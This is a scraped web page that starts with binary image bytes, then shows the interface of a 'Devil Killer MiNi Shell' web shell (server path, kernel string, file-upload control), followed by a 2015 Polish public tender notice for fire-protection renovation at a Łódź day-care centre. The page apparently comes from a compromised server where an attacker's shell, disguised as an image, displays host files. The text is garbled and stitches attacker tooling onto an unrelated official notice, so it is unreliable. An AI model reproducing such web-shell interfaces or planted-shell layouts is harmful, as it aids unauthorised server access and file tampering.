JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150731/195664-N-2015.html

<p class="kh_header"><b>Łódź: Roboty  remontowo budowlane polegające na zabezpieczeniu p. poż. w pomieszczeniach zajmowanych przez Dom Dziennego Pobytu w Łodzi przy ul. Piotrkowskiej 203/205.</b><br>
<b>Numer ogłoszenia: 195664 - 2015; data zamieszczenia: 31.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uml.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty  remontowo budowlane polegające na zabezpieczeniu p. poż. w pomieszczeniach zajmowanych przez Dom Dziennego Pobytu w Łodzi przy ul. Piotrkowskiej 203/205..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  remontowo budowlanych polegających na zabezpieczeniu p. poż. w pomieszczeniach zajmowanych przez Dom Dziennego Pobytu w Łodzi przy ul. Piotrkowskiej 203 205,  zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych (załącznik nr 6 do SIWZ) oraz przedmiarem robót (załącznik
nr 7 do SIWZ).
Zakres robót budowlanych obejmuje
-demontaż przeszklonych ścianek działowych, okładzin panelowych i drzwi w pokoju Administratora, kraty poprzecznej w korytarzu przy pokoju Administratora, demontaż ścianek i okładzin drewnianych (szatnia przy jadalni),demontaż okładzin boazeryjnych w jadalni, demontaż siedziska i oparcia (półpiętro - zejście do jadalni, demontaż okładzin drewnianych - wyjście ewakuacyjne na klatkę schodową z jadalni
-wykonanie ścianek działowych o odp. ogniowej EI30, gr.10 cm z płyt G-K ognioochr. gr.12,5 mm (np.Rigips RIGIMETER Fire-Line,Fire_Line Plus typ DF (GKF) lub równoważne, na ruszcie metalowym z pokryciem dwuwarstwowym obustronnie, z wypełnieniem wełną mineralną kamienną o gęstości pow.10 kg m3 lub szklaną o klasie reakcji na ogień A1 gr.10 cm - w miejscach po rozebranych ściankach przeszklonych i zdemontowanej kracie w korytarzu
-zakup i montaż drzwi stal. p.poż o odporności ogniowej EI 30,jednoskrzydłowe,90,
z samozamykaczem,klamki,szyldy,zamek z wkładką patentową,wyposażone w uszczelki pęczniejące dymoszczelne (podw. właściwości ogniochronne),ościeżnica przeciwpożarowa metalowa stała z blachy ze stali węglowej gr. min.1,5 mm (atest - aprobata techniczna) spawana, malowana proszkowo. Montaż drzwi pianą przeciwpożarową o odp. ogniowej min. EI 30 lub zaprawą murarską.Kolor drzwi uzgodniony z Użytkownikiem 
- pokój Administratora - skrzydło wyposażone od 1 3 wys. w szybę ognioodporną przezroczystą
- korytarz (nowopostawiona ścianka z G-K,poprzeczna) - skrzydło pełne
- jadalnia - 2 kpl. drzwi ze skrzydłami pełnymi
- 2-krotne malowanie emulsyjne ścianek nowopostawionych z płyt G-K (pokój Administratora, ścianka poprzeczna w korytarzu przy pokoju Administratora), nowych ścian i okładzin z płyt G-K (szatnia) i zabudowy rur na półpiętrze zejścia do jadalni
- 2-krotne malowanie emulsyjne (z naprawą tynków oraz gruntowaniem ścian środkiem gruntującym) po demontażu okładzin ściennych drewnianych na klatkach schodowych i w jadalni
- montaż listew przypodłogowych (profile do paneli) - postawione ścianki działowe z płyt G-K i w jadalni (po demontażu okładzin drewnianych)
- wywóz gruzu po wykonanych robotach.
Wykonawca wykona wszystkie prace opisane specyfikacją techniczną wykonania i odbioru robót budowlanych, zgodnie z przedmiarem robót, ze specyfikacją istotnych warunków zamówienia, z zasadami wiedzy technicznej i obowiązującymi  w Rzeczypospolitej Polskiej przepisami prawa powszechnie obowiązującego.
Wykonawca wykona roboty budowlane,  które nie zostały wyszczególnione  w przedmiarze robót, a są konieczne do realizacji przedmiotu zamówienia. 
Dokumenty - przedmiar robót , specyfikacja techniczna wykonania i odbioru robót przekazane przez Zamawiającego stanowią komplet, a wymagania wyszczególnione choćby w jednym z nich są obowiązujące dla Wykonawcy tak jakby zawarte były w całym komplecie. 
Wykonawca nie może wykorzystywać błędów lub opuszczeń w dokumentach, a o ich wykryciu powinien natychmiast powiadomić Zamawiającego, który dokona odpowiednich zmian lub poprawek. 
Cechy materiałów i elementów budowli muszą być jednorodne i wykazywać bliską zgodność z określonymi wymaganiami. W przypadku, gdy materiały lub roboty nie będą  w pełni zgodne z przedmiarem robót lub specyfikacją techniczną wykonania i odbioru robót budowlanych i wpłynie to na niezadowalającą jakość robót, to takie materiały będą niezwłocznie zastąpione innymi, a roboty rozebrane na koszt Wykonawcy.
Zamawiający udostępni Wykonawcy pomieszczenie dla potrzeb socjalno - magazynowych, ale nie ponosi odpowiedzialności za przechowywane w nim rzeczy.
Po zakończeniu prac budowlanych Wykonawca zobowiązany jest do uporządkowania terenu prowadzonych robót oraz pomieszczenia socjalno - magazynowego.
Wykonawca ponosi odpowiedzialność za następstwa  i za wyniki działalności w zakresie
organizacji i wykonywania robót budowlanych
zabezpieczenia interesów osób trzecich
ochrony środowiska
warunków bezpieczeństwa pracy.
Wykonawca przedstawi informacje zaświadczające o dopuszczeniu materiałów do stosowania w budownictwie na podstawie ustawy z dnia 16 kwietnia 2004 r. O wyrobach budowlanych. Materiały powinny być oznaczone znakiem B lub CE. Do materiałów i urządzeń nie posiadających oznaczeń B lub CE załączy aprobaty techniczne potwierdzające przydatność wyrobu budowlanego do zamierzonego zastosowania.
Wykonawca zapewni, aby tymczasowo składowane materiały do czasu, gdy będą
potrzebne do robót były zabezpieczone przed zanieczyszczeniem i wpływem warunków
atmosferycznych, zachowały swoją jakość, właściwość do robót i były dostępne do kontroli. 
Miejsca czasowego składowania będą zlokalizowane w obrębie terenu budowy w miejscach uzgodnionych z Zamawiającym lub poza terenem budowy w miejscach zorganizowanych przez Wykonawcę.
Jeśli przedmiar robót lub specyfikacja techniczna wykonania i odbioru robót budowlanych przewidują możliwość wariantowego zastosowania rodzaju materiałów w wykonywanych robotach, Wykonawca powiadomi Zamawiającego o swoim zamiarze co najmniej na siedem dni roboczych przed ich wbudowaniem, wpisem do wewnętrznego Dziennika Budowy. Po pisemnej akceptacji Zamawiającego (wpis w Dziennik Budowy wewnętrzny) wybrany i zaakceptowany rodzaj materiału nie może być później zmieniany bez zgody Zamawiającego.
W trakcie realizacji robót Wykonawca będzie stosował urządzenia sprawne technicznie nie powodujące nadmiernego hałasu i zanieczyszczenia środowiska olejem, smarami itp. 
Wykonawca zobowiązywany jest do używania tylko takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót.
Podstawowym aktem prawnym określającym standardy techniczne jakim powinny odpowiadać zrealizowane roboty budowlane jest Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. Nr 75, poz. 690 z późn. zm. ). 
Podstawowe zasady, których należy przestrzegać określone zostały w Rozporządzeniu
Ministra Infrastruktury z dnia 06 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy
podczas wykonywania robót budowlanych ( Dz. U. z 2003 r.Nr 47, poz. 401 ). 
Wykonawca jest odpowiedzialny za prowadzenie robót zgodnie z umową oraz za jakość zastosowanych materiałów i wykonywanych robót, za ich zgodność z przedmiarem robót, wymaganiami specyfikacji technicznej wykonania i odbioru robót budowlanych oraz poleceniami Zamawiającego. Wykonawca oznaczy teren robót w sposób określony
przepisami, zapewni bezpieczeństwo pracowników jak i osób postronnych.
Zamawiający uprawniony będzie do dokonywania kontroli. Zapewniona mu będzie ze strony Wykonawcy wszelka potrzebna do tego pomoc. 
Wszystkie roboty ulegające zakryciu podlegają dokonaniu odbioru częściowego przez Zamawiającego (w terminie ustalonym z nim) po ich zgłoszeniu przez Wykonawcę wpisem   w wewnętrzny Dziennik Budowy, który musi znajdować się na terenie robót. W przypadku nie zgłoszenia przez Wykonawcę robót ulegających zakryciu Zamawiający wymaga przywrócenia do poprzedniego stanu na koszt Wykonawcy.
Zamawiający zezwala na użycie tylko tych materiałów, które są dopuszczone do stosowania w budownictwie na podstawie ustawy z dnia 16 kwietnia 2004 r. O wyrobach budowlanych i posiadają
- certyfikat na znak bezpieczeństwa, wykazujący że zapewniono zgodność z kryteriami
technicznymi określonymi na podstawie polskich Norm lub aprobat technicznych oraz
właściwych przepisów i dokumentów technicznych,
- deklarację zgodności lub certyfikat zgodności z Polską Normą lub Polską Normą
Przenoszącą Normy Zharmonizowane,
- aprobatę techniczną w wypadku wyrobów dla których nie ustanowiono Polskiej Normy.
Materiały, które nie spełniają tych wymagań będą odrzucone.
Na każde żądanie Inspektora nadzoru inwestorskiego lub innej osoby wskazanej przez
Zamawiającego, Wykonawca obowiązany będzie wykazać, że stosowane w wykonywaniu
robót wyroby budowlane spełniają  wymagania określone w ustawie o wyrobach
budowlanych.
Na wykonanie robót objętych zamówieniem nie jest wymagane pozwolenie na budowę wobec powyższego nie wymaga się prowadzenia dziennika budowy w rozumieniu prawa budowlanego - Zamawiający dostarczy wewnętrzny Dziennik Budowy. 
W trakcie robót Wykonawca winien zgromadzić dokumenty
- protokół przekazania terenu budowy,
- Dziennik Budowy wewnętrzny
- umowy cywilnoprawne z osobami trzecimi i inne umowy cywilnoprawne jeśli będą
potrzebne
- protokół odbioru robót (sporządzany po zakończeniu robót całkowicie lub
częściowo);
- atesty, certyfikaty, instrukcje obsługi i gwarancje na urządzenia montowane podczas
budowy.
Dokumenty budowy będą przechowywane na terenie budowy w miejscu odpowiednio
zabezpieczonym. Zaginięcie któregokolwiek z dokumentów budowy spowoduje jego
natychmiastowe odtworzenie w formie przewidzianej prawem. Wszelkie dokumenty budowy będą zawsze dostępne i przedstawione do wglądu na życzenie Zamawiającego.
Obmiar robót będzie określać faktyczny zakres robót oraz roboty wykraczające poza
zakres prac wymienionych w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych w jednostkach ustalonych w kosztorysie. 
Obmiaru dokonuje Wykonawca przy udziale Zamawiającego.
O zakresie obmierzonych robót i o terminie obmiaru Wykonawca zawiadomi
Zamawiającego co najmniej 3 dni przed tym terminem.
Obmiarów dokonywać należy zgodnie z zasadami przyjętymi w katalogach nakładów
rzeczowych zastosowanych do sporządzania kosztorysów ofertowych.
Obmiary będą przeprowadzane w czasie umożliwiającym stwierdzenie faktycznie
wykonanych prac.
Przekazanie terenu budowy nastąpi protokolarnie w dniu podpisania umowy.
Wykonawca zabezpieczy  i oznaczy teren budowy zgodnie z przepisami ustawy - Prawo budowlane, w szczególności w sposób zapewniający bezpieczeństwo osób trzecich.
Od chwili protokolarnego przekazania Wykonawcy terenu budowy, Wykonawca będzie ponosił odpowiedzialność i koszty za organizację swojego zaplecza budowy na tym terenie, a także utrzymanie ładu i porządku oraz usuwanie wszelkich odpadów powstałych wskutek wykonywania robót budowlanych. 
Wykonawca zobowiązany będzie  w szczególności do:
- utrzymywania porządku w trakcie realizacji robót oraz systematyczne porządkowanie miejsca wykonywania robót,
- prowadzenia robót w sposób bezpieczny,
- natychmiastowego i skutecznego usuwania wszelkich szkód i awarii wynikłych przy realizowaniu robót,
- prowadzenia dokumentacji technicznej związanej z realizacją umowy,
przechowywanie jej na terenie wykonywania robót oraz udostępnienie jej osobom
upoważnionym do dokonania wpisów,
- stosowania nowych materiałów, wyrobów dopuszczonych do użytkowania w budownictwie w rozumieniu przepisów prawa budowlanego, w szczególności wbudowane materiały, wyroby i urządzenia będą posiadały odpowiednie dokumenty
jakościowe i techniczne, jak atesty, certyfikaty, deklaracje zgodności z PN, aprobaty techniczne, itp., które Wykonawca obowiązany jest przekazać po zakończeniu robót Zamawiającemu wraz z pisemnym oświadczeniem o zgodności przedstawionych atestów z materiałami budowlanymi. Zastosowanie materiału zamiennego możliwe jest po
uzyskaniu akceptacji Zamawiającego potwierdzone wpisem w dokumentacji technicznej związanej z realizacją umowy,
- zapewnienia Zamawiającemu możliwości stałej kontroli prowadzonych robót,
- zapewnienia wykonania robót w formie i godzinach uzgodnionych z Zamawiającym, które zapewnią ciągłość prac prowadzonych na terenie budowy, jednocześnie nie
dezorganizując pracy w tych obiektach,
- stosowania ogólnie obowiązujących przepisów prawa pracy, zapewnienia
przestrzeganie przepisów oraz zasad w zakresie bezpieczeństwa i higieny pracy,
bezpieczeństwa i ochrony zdrowia, ochrony przeciwpożarowej przez osoby przebywające na terenie budowy,
- wykonania i utrzymania na własny koszt wszelkich zabezpieczeń i urządzeń
niezbędnych do wykonania ppkt. 8.
Rozliczenie za wykonanie robót budowlanych stanowiących przedmiot zamówienia
będzie dokonywane na podstawie faktury VAT wystawionej po dniu dokonania odbioru
ostatecznego robót lub po dniu podpisania protokołu lub innego dokumentu stwierdzającego usunięcie przez Wykonawcę wad i usterek.
Płatności będą realizowane w terminie nie dłuższym niż 30 dni kalendarzowych od daty otrzymania przez Zamawiającego prawidłowo wystawionej przez Wykonawcę faktury VAT po dokonaniu ostatecznego odbioru robót.
Za dzień zapłaty uznaje się dzień obciążenia rachunku bankowego Zamawiającego.
Zamawiający może potrącać kary umowne z wynagrodzenia Wykonawcy.
Z chwilą wykonania robót budowlanych Wykonawca dokona w wewnętrznym Dzienniku Budowy wpisu o gotowości do odbioru ostatecznego wykonanych robót budowlanych oraz zawiadomi pisemnie o tym Zamawiającego. 
W zależności od ustaleń roboty podlegają odbiorowi
- częściowemu - roboty ulegające zakryciu
- ostatecznemu.
-Odbioru ostatecznego dokona komisja wyznaczona przez Zamawiającego w obecności Wykonawcy w ciągu 7 dni od otrzymania zawiadomienia od Wykonawcy.
-W dniu odbioru ostatecznego, Wykonawca złoży Zamawiającemu
- deklaracje zgodności lub certyfikaty zgodności wbudowanych materiałów z pisemnym oświadczeniem Wykonawcy, że takie zostały wbudowane,
- protokół przekazania terenu budowy,
- wewnętrzny Dziennik budowy,
- umowy cywilnoprawne z osobami trzecimi i inne umowy cywilnoprawne,
- protokół odbioru robót;
- atesty, certyfikaty, instrukcje obsługi i gwarancje urządzenia montowane podczas
budowy.
Protokół odbioru ostatecznego robót budowlanych musi zawierać co najmniej:
- nazwę i adres siedziby Zamawiającego, 
- nazwę firmę albo imię i nazwisko, siedzibę albo miejsce zamieszkania i adres
Wykonawcy, 
- oznaczenie umowy, której dotyczą roboty budowlane stanowiące przedmiot odbioru końcowego,
- imiona i nazwiska osób wyznaczonych do odbioru ostatecznego przez
Zamawiającego i Wykonawcę,
- stwierdzenie, że roboty budowlane zostały wykonane zgodnie z umową, o której albo stwierdzenie, że roboty budowlane nie zostały wykonane zgodnie z umową wraz  z uzasadnieniem,
- określenie terminu usunięcia wad lub usterek,
- własnoręczne podpisy.
Załącznikami do protokołu odbioru ostatecznego będą opinie, oświadczenia, wnioski oraz inne dokumenty i informacje składane w toku odbioru ostatecznego robót budowlanych.
Wykonawca będzie  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę gwarancyjną co najmniej 40.000,00 zł na jedno i wszystkie zdarzenia przez cały okres obowiązywania niniejszej umowy.
Wykonawca udzieli Zamawiającemu gwarancji na wykonane roboty budowlane na okres wskazany w ofercie.
Każdy Wykonawca w prowadzonym postępowaniu może złożyć tylko jedna ofertę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.44.21.00-8, 45.42.11.00-5, 45.42.11.52-4, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca polega na zasobach innych podmiotów na zasadach
określonych w art. 26 ust. 2 b ustawy Prawo zamówień publicznych zobowiązany jest
udowodnić Zamawiającemu, iż będzie dysponował zasobami innych podmiotów  w  stopniu niezbędnym dla należytego wykonania zamówienia w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia. 
